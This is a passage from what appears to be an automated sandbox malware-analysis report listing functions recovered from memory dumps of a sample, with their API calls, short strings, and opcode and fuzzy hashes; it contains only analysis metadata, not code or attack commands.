                                              • Instruction Fuzzy Hash: 211128B19002498BDB10DFAAD4457AEFFF5EF89320F10841AD519A7250CB79A545CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0D794D68 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0D79D27D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2749376384.000000000D790000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D790000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d790000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 660a7aec1fd8b1e12fbb51baa4f8f5bfa22bec71f5e56129a8397c1a32f3bfec
                                              • Instruction ID: ef062e95eba552b76fcfc44911bf2b9c9887ca27dce5a06d80aac57cfbd174c9
                                              • Opcode Fuzzy Hash: 660a7aec1fd8b1e12fbb51baa4f8f5bfa22bec71f5e56129a8397c1a32f3bfec
                                              • Instruction Fuzzy Hash: 6911D2B58002499FDB20DF9AD544BAEBBF8EB48320F108419E518A7210C375A944CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 06068660 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 060686C6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2745836844.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6060000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 226402d7d1fe0bead272aff9fdb102b22eaeb4b88745c86f871dfe799c289219
                                              • Instruction ID: f56b3e21f6021f97b821c2eb312dd517adca9003cc985863a1e77df98f6a70bd
                                              • Opcode Fuzzy Hash: 226402d7d1fe0bead272aff9fdb102b22eaeb4b88745c86f871dfe799c289219
                                              • Instruction Fuzzy Hash: 4C11E0B5C102498FDB10DF9AD844ADEFBF4EF89310F10841AE529B7610C379A545CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0774BA08 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'jq
                                              • API String ID: 0-3676250632
                                              • Opcode ID: 38207d7fe035954619aa06da07e697fdac73ab291b68b33c333bf2cd38b4a895
                                              • Instruction ID: db64d1fb67c22d2bea6ff2e653a4b299b12b2ae624b432938b4b3c806d4aabd8
                                              • Opcode Fuzzy Hash: 38207d7fe035954619aa06da07e697fdac73ab291b68b33c333bf2cd38b4a895
                                              • Instruction Fuzzy Hash: 4591A3B0A106058FCF05FBB8D98966DBBB6BF88340F5084A9D445E7268DB38DC14CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CDAD7 Relevance: 1.4, Strings: 1, Instructions: 164COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PHjq
                                              • API String ID: 0-751881793
                                              • Opcode ID: d8cd51dc92fa45e0632235b24488162f0d6cc34427aa0341bf360a255a4660b4
                                              • Instruction ID: 20a0e5afba9b294be2df2bbe5bb954ae929f74740df342ee44bd20400f85b4fc
                                              • Opcode Fuzzy Hash: d8cd51dc92fa45e0632235b24488162f0d6cc34427aa0341bf360a255a4660b4
                                              • Instruction Fuzzy Hash: B4515635600505CFCB58DF28C984BADBBF6AF88312F14816DE84A9B261CB71E846CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CAD20 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PHjq
                                              • API String ID: 0-751881793
                                              • Opcode ID: 65d27e9b197b6eacfc57117175ca0b823df8bf18aec2c265c06a32f13ae44ef5
                                              • Instruction ID: 3a68e1ea20b7091977e374931b5838811aa878ea0de1a64f3ddd730ec0fed985
                                              • Opcode Fuzzy Hash: 65d27e9b197b6eacfc57117175ca0b823df8bf18aec2c265c06a32f13ae44ef5
                                              • Instruction Fuzzy Hash: D451D674700218CFCB54DF68D598AADBBF2AF49715B2585ACE4069B3A1DB31EC41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07740DD3 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: D
                                              • API String ID: 0-2746444292
                                              • Opcode ID: 0799bb24fa3daef27b0bb0f575cd4f458b9395f2fe62683882c275799e944b89
                                              • Instruction ID: 89e1a7d0417f9436ecf4a0bec06ec47003d99730225fd2f4d51432a69c4b36b4
                                              • Opcode Fuzzy Hash: 0799bb24fa3daef27b0bb0f575cd4f458b9395f2fe62683882c275799e944b89
                                              • Instruction Fuzzy Hash: F331665140E7C65FC71397789D645857F70AE03224B1A06EBC4D1CF6F3D618095ACBA7
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CDCB4 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (nq
                                              • API String ID: 0-2756854522
                                              • Opcode ID: 01b6e5de252c5b05308225306b4a3d8bdffa988a2c088b5bab0ee3ac28d304d9
                                              • Instruction ID: 472ee764256fd80c3ef7dc2c9b8b429db4e89cb53c1f74eb91be20a8d1dba76f
                                              • Opcode Fuzzy Hash: 01b6e5de252c5b05308225306b4a3d8bdffa988a2c088b5bab0ee3ac28d304d9
                                              • Instruction Fuzzy Hash: 644150306006008FC7A59F38D848B5A7BE6AF85315F5585BED49ACB3A2DF74E84ACB41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07740EF1 Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 43kq
                                              • API String ID: 0-3643480293
                                              • Opcode ID: d453dc1ca821d6af981412f35cf07177822ba2d92e07d14fc31d88984b62ee68
                                              • Instruction ID: 74dcd87053f99d8ee00b8d857e8fa642374acaf51d729f8363bf671875a6a038
                                              • Opcode Fuzzy Hash: d453dc1ca821d6af981412f35cf07177822ba2d92e07d14fc31d88984b62ee68
                                              • Instruction Fuzzy Hash: 39E065297042509BC3096736B9646ED2B67BBC1260709C56BE546CB395CD394F044794
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07740F00 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 43kq
                                              • API String ID: 0-3643480293
                                              • Opcode ID: aa5418f56bbc2833e5bf57180f3bf895bd6f611a503005541acffa53719f4b6b
                                              • Instruction ID: 57d89a30d8b7bc9ab06873505915c4b5aeaa0bdca69619ba05b1d07e3668ab4a
                                              • Opcode Fuzzy Hash: aa5418f56bbc2833e5bf57180f3bf895bd6f611a503005541acffa53719f4b6b
                                              • Instruction Fuzzy Hash: 1AE08C397002186BD318AB37B824A7F369FEBC0660B08C43EE6068B384CC799C0143A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0774F740 Relevance: 1.3, Strings: 1, Instructions: 14COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: T0?
                                              • API String ID: 0-4258546864
                                              • Opcode ID: 3080f46e6680df444e30c0424dc97c6564153b6e5987a5c709fadc23bf160d71
                                              • Instruction ID: 53ff11b41e0331cea28eb838c6325555d9416050060cb6c42a846c557a157670
                                              • Opcode Fuzzy Hash: 3080f46e6680df444e30c0424dc97c6564153b6e5987a5c709fadc23bf160d71
                                              • Instruction Fuzzy Hash: 33D012322001089F4B81EAE4E800D5277DCFB147507409436F508C7520E721E824D7D1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080C0040 Relevance: .8, Instructions: 755COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: be209aeed095f92bfa6ae20623be0ac2e5869c8f91488960eaa863a4e04c9e2a
                                              • Instruction ID: 4c5b9f68a902d86281597b300aef339878216a8b67f803e0e673d18a63e1b41b
                                              • Opcode Fuzzy Hash: be209aeed095f92bfa6ae20623be0ac2e5869c8f91488960eaa863a4e04c9e2a
                                              • Instruction Fuzzy Hash: 2C62A170D41F42CAD7B49FB495883AE7ED2AB45305F704A2ED1BACA750DB34A482CF49
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0774AB18 Relevance: .6, Instructions: 597COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d78352db4a35d301ea9346fe6968fc47a8493768e5cbb8afbbf1a5791e91d2fa
                                              • Instruction ID: 8c8703bc52bad49bcca5dd180eb55dd6c73d29851f237c241c053bf2fee7dddd
                                              • Opcode Fuzzy Hash: d78352db4a35d301ea9346fe6968fc47a8493768e5cbb8afbbf1a5791e91d2fa
                                              • Instruction Fuzzy Hash: 50123D70A143018FCB06FBB8DA98A2DBBB6AF85240F4544AAD445E7369DF3CDD04C366
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080C0017 Relevance: .5, Instructions: 465COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8c2e53c910dbc82ac8f3153f7192d46a45f5104567e192d8c920fa41e3f50a48
                                              • Instruction ID: fa82d35c7b436ae9288d7ffae96900e7ca51ddafd732e814adec4f8fb6f0b5ec
                                              • Opcode Fuzzy Hash: 8c2e53c910dbc82ac8f3153f7192d46a45f5104567e192d8c920fa41e3f50a48
                                              • Instruction Fuzzy Hash: 20224CB0945F42CAD7B49FA4858429EBED1AB06305F704A5FC0FACA365DB34A087CF49
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0774A111 Relevance: .4, Instructions: 429COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 730c600ab7a7f600e6e0386c9e82c0b5151394cd6b44051e0ea0e76516153519
                                              • Instruction ID: b2b453cca4417e6c0996ae5326bc14a46b10ed072fe360cbee4b8e68eb6c9211
                                              • Opcode Fuzzy Hash: 730c600ab7a7f600e6e0386c9e82c0b5151394cd6b44051e0ea0e76516153519
                                              • Instruction Fuzzy Hash: 44F17C70E14205CBCB05BB78D999AACBBB2FB88340F1185AAD446E7358EF385C45CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0774A120 Relevance: .4, Instructions: 427COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cc736f5d3e334ac5e73510e1838c4ffbf8f42cd04e5628f7a42197e053e48aac
                                              • Instruction ID: 7f33b098bdc3e5910fda41fac9f1930893f0566ae7e782586adefa8ddd80d407
                                              • Opcode Fuzzy Hash: cc736f5d3e334ac5e73510e1838c4ffbf8f42cd04e5628f7a42197e053e48aac
                                              • Instruction Fuzzy Hash: 57F18C70E14205CBCB05BB78D999AADBBB2FB88340F1185AAD446E7358EF385C45CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080C85F3 Relevance: .4, Instructions: 410COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1e3bfa1945cb6b2d098c246f93cf6de0d8e9e3fd0a71ef7f598b5b27d30df552
                                              • Instruction ID: b07d787892af98d7a7c57a5202a69b802fadce1dbe2b6f5ced97a324a7000a55
                                              • Opcode Fuzzy Hash: 1e3bfa1945cb6b2d098c246f93cf6de0d8e9e3fd0a71ef7f598b5b27d30df552
                                              • Instruction Fuzzy Hash: 9C02D534600204DFCB48DF68D498AAD7BF2BF89315F5581B8E4099B7A6DB34EC86CB54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07749456 Relevance: .4, Instructions: 395COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 298a81d148a70effe33658cccbc2514910adc08f7a0ff45072436bdedd8b379a
                                              • Instruction ID: 2c453a44f6436284ae571359c60e203818ce647a564f90a099d5db5ffa443c26
                                              • Opcode Fuzzy Hash: 298a81d148a70effe33658cccbc2514910adc08f7a0ff45072436bdedd8b379a
                                              • Instruction Fuzzy Hash: B5D12530A04351CFCB06AB78D99956D7BB2FF86240F4545AAD081E73AADB3CAC05CB55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07748840 Relevance: .4, Instructions: 366COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 56ac20af2ff7cb37fe9db6b21c3ad4afc99a73761b981cfdb9da652903a34d97
                                              • Instruction ID: dee0da4c10103fa5914fcc59d884c0ac69ae3c6839e10c3e77cda30c6681dd26
                                              • Opcode Fuzzy Hash: 56ac20af2ff7cb37fe9db6b21c3ad4afc99a73761b981cfdb9da652903a34d97
                                              • Instruction Fuzzy Hash: 9EC1D031A10715CBCF06BBB8E98962DBBF6EF88240F4449A9D845E3358DF389C54C796
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07749530 Relevance: .4, Instructions: 351COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 68a5feb7876482d7c93108ed05298620860be00a8ebcf414c6d04aa72803f0c1
                                              • Instruction ID: 9c40bb873b0ef465c9ec56d83352a4aec904c461b7c93bacd32d7a040de729dc
                                              • Opcode Fuzzy Hash: 68a5feb7876482d7c93108ed05298620860be00a8ebcf414c6d04aa72803f0c1
                                              • Instruction Fuzzy Hash: 3AC1B071B10611CFCB05FBB8D98966EBBB6BF88240F4049A9D446E7368DF38AC11CB55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07749B97 Relevance: .3, Instructions: 336COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e7b6638b8bc843c84f2bc07e7d713d566dae9afb9b35c8369f0a1219b6494c7e
                                              • Instruction ID: 4f5529f50486a36c86322d8324e52c9b6e8712537a9a94e1b071a529df7ae965
                                              • Opcode Fuzzy Hash: e7b6638b8bc843c84f2bc07e7d713d566dae9afb9b35c8369f0a1219b6494c7e
                                              • Instruction Fuzzy Hash: E9C18F30A10205CFCB09FFB9E59966DBBB6EF88240F418469E455E7368EF389C09CB55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 077494C4 Relevance: .3, Instructions: 329COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5bddb8c9e5fc99ed932ba379269ccc54b520564373ee646f9d0c1e3771926c5e
                                              • Instruction ID: 9c082d94b68c200c20c7194058a25163238b0bcaf4df9b6dcfff9ffe3c0f19c0
                                              • Opcode Fuzzy Hash: 5bddb8c9e5fc99ed932ba379269ccc54b520564373ee646f9d0c1e3771926c5e
                                              • Instruction Fuzzy Hash: B4B10570B00211CFCB05BBB8D9896AD7BB6FF89240F4145A9D046E73A9DF38AC15CB55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0774020D Relevance: .3, Instructions: 314COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bf39c26157ac9d04bf90c206d8b5b5a1375e662957aeef8e236f4a7522b20b98
                                              • Instruction ID: 1cc6712f8a4e6d9bc697eb49f02dc25591cf04076479f405f6d403bdc701110a
                                              • Opcode Fuzzy Hash: bf39c26157ac9d04bf90c206d8b5b5a1375e662957aeef8e236f4a7522b20b98
                                              • Instruction Fuzzy Hash: 26C137746202048FC748EF38D694929BBE6FF8A640B5584AEE44ADB365EB35ED04CB41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07749507 Relevance: .3, Instructions: 310COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e64e3726765bc9bfe80dbd0072505f34bdefdc4aa6e2db22db0e4cc0e6a175cc
                                              • Instruction ID: 49a8a0eb91f995ea28e230d6b79ae332f2333041dfc186d90b8f04f4d1146f35
                                              • Opcode Fuzzy Hash: e64e3726765bc9bfe80dbd0072505f34bdefdc4aa6e2db22db0e4cc0e6a175cc
                                              • Instruction Fuzzy Hash: D0B1F230B10211CFCB06BBB8D99956D7BB6BF89240F4145A9D046E73A8DF3CAC15CB55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080C229C Relevance: .3, Instructions: 305COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8c79f04da4750011f79ad88beb98745193f78faf738a01f5c7bf8c9188c4f647
                                              • Instruction ID: 36abe59b2d70aab42d55206d9042a510153f57249aed3f2659f13326a61d9ad6
                                              • Opcode Fuzzy Hash: 8c79f04da4750011f79ad88beb98745193f78faf738a01f5c7bf8c9188c4f647
                                              • Instruction Fuzzy Hash: E8F1A1B4A1424A8FE7A5CF28C444759FBE1BB09315F0982A9D5489F383E376E8C5CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 077487F7 Relevance: .3, Instructions: 285COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ce14256168ed4467f2ed9d748ee56e65cdaeaf537e437829c97db2e1a60af104
                                              • Instruction ID: d3c9a44f726133611edd84eb4dd288a9fc2221719090ad6e7c44f195959f500a
                                              • Opcode Fuzzy Hash: ce14256168ed4467f2ed9d748ee56e65cdaeaf537e437829c97db2e1a60af104
                                              • Instruction Fuzzy Hash: 7DA1E131A10715CFCB06BBB8E59952DBBB2EF88240F4448AAD845E7369DF389C54C792
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07748830 Relevance: .3, Instructions: 273COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 75163cd7b0888588893644d2c915ec71b4748952b87500614f86d0a7568ea6a3
                                              • Instruction ID: 839ef83f4bf1419dc9b319b470743c49d41b3ede079f095765be7cc2009c656a
                                              • Opcode Fuzzy Hash: 75163cd7b0888588893644d2c915ec71b4748952b87500614f86d0a7568ea6a3
                                              • Instruction Fuzzy Hash: 9191DE31A10715CBCF06BBB8E59952DBBB2AF88240F4448B9E845E7358DF38AD54C792
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0774B6CC Relevance: .2, Instructions: 218COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cda616a29f1c19eaa3e6d686e62685b942c1295e58e36a46e3fa7519c55b21ec
                                              • Instruction ID: 039f247249d19ef9e1984850f7e4b0e1a9be7c00f1029dac1f151011bc0d1bbd
                                              • Opcode Fuzzy Hash: cda616a29f1c19eaa3e6d686e62685b942c1295e58e36a46e3fa7519c55b21ec
                                              • Instruction Fuzzy Hash: 7371F471A14605CBCB05FBBCEA8967EBBB5EF88240F4045AAD445E3369DF389C08C395
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CD850 Relevance: .2, Instructions: 217COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 28db8b90c6ea6966a39e0e335e88c5c654e9098db29ebce84520f2d2541be599
                                              • Instruction ID: 0cc2b5b6a42df84e434f9daf552b4b7fd6baa03ed5a9aed40c84195f6be55793
                                              • Opcode Fuzzy Hash: 28db8b90c6ea6966a39e0e335e88c5c654e9098db29ebce84520f2d2541be599
                                              • Instruction Fuzzy Hash: AB812935A042098FDBA4DF69D480BAEB7F7EF84226F14823ED85997290D731D886CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0774B6F8 Relevance: .2, Instructions: 200COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2747793938.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7740000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d840f0b13115d74076f9def727242a9e371bacf7e3b8f8f5eceefbd56ad6e0ef
                                              • Instruction ID: 4af507a53d419b6dae4adf41534c5fc3211b90281303772071d01ff8ff4cc0eb
                                              • Opcode Fuzzy Hash: d840f0b13115d74076f9def727242a9e371bacf7e3b8f8f5eceefbd56ad6e0ef
                                              • Instruction Fuzzy Hash: B461B471A10605CBCB05FBBCEA89A7EBBB5AF88240F40856AD445E3368DF389C54C7D5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080CA960 Relevance: .2, Instructions: 186COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_80c0000_rFV23+17555.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0f0a319efd78d99833be23249bd6aae37d59ef4786e0570945b25a246814b39e
                                              • Instruction ID: 08e4095a2b3aa7dad1e79b5b3c5461f8d8f6013720dae583aa649770e481eed5
                                              • Opcode Fuzzy Hash: 0f0a319efd78d99833be23249bd6aae37d59ef4786e0570945b25a246814b39e
                                              • Instruction Fuzzy Hash: B371D334240604CFDB54DF28D898E697BF6FF89315F1585A9D44A8B276DB30EC4ACBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 080C5780 Relevance: .2, Instructions: 152COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2748055055.00000000080C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
